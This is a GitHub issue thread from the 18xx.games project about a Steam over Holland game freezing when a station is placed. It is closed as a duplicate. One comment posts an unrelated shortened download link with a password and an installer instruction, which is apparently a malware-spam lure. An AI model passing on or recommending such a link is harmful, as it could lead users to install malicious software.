### ISSUE TITLE
[Steam over Holland] Game frozen

### ISSUE THREAD

**Issue by dtschirmer** [tobymao/18xx#11179] opened 2024-08-27 16:14 UTC
**What's your Game ID?**
https://18xx.games/game/174363

**How to Reproduce the Bug?**

The game froze when I was trying to place a station on Den Haag, with the AR company.

edit: Maybe the same problem as issue #11157?

**Which Browser / Platform?**
Firefox 129.0.2 (64-bit)
Mac OS 12.6.1

<img width="1424" alt="Screen Shot 2024-08-27 at 9 13 23 AM" src="https://github.com/user-attachments/assets/5c5cea48-7784-4d06-8ca1-0cfae10247d2">

**Comment by c0ffincolors** [comment] 2024-08-27 16:19
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dtschirmer** [comment] 2024-08-27 16:29
I don't think I can run that on a mac

**Comment by philcampeau** [comment] 2024-08-27 19:07
Duplicate of #11157

**Closed by philcampeau** 2024-08-27 19:07 UTC
Labels: needs triage
